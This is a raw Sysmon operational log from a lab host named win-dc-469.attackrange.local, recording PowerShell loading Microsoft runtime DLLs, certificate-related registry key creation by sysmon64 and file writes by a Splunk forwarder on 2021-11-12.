12:18:42.699{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 12241200x800000000000000057346908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057346888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.680{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 12241200x800000000000000057346887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057346866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.680{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 12241200x800000000000000057346865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.780{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.701{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 12241200x800000000000000057346857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.680{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 13241300x800000000000000057346856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:42.680{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d7d7bf-0x6eb50ae2) 12241200x800000000000000057346855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.680{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 11241100x800000000000000057346854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.633{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.633{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DEE09A6F139572D78F557EB5898603,SHA256=A2AE86C4DB2A8AD2A54A16BAC2155643DD1DB97817B18FA5BA8D9075948DE49Cfalsetrue 11241100x800000000000000057346852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.580{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 11241100x800000000000000057346851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.580{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.580{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4B776FC29A7FBE37C05AEDC993745685,SHA256=7E51B6A575701B0A4C33D9856F10A4F59062A6AB77DADC10F4EAD0BEBCC088FEfalsetrue 23542300x800000000000000057346849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.580{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=640199E4EA7FEEEAD308A00BC19731BF,SHA256=38A589170D1DF4CA14EB904FB7C8C6D8F19DA2C21CE3121C3D9D2BB1062DE4E5falsetrue 11241100x800000000000000057346848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.580{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.580{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=341560F0E44EAF94838E1737A4E272F1,SHA256=562C5FEAD6E1391EF29093FAAED2061857A29890D5F371007E7FE99813DF02B6falsetrue 12241200x800000000000000057346846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.533{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 12241200x800000000000000057346831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.549{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.549{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057346821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.549{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 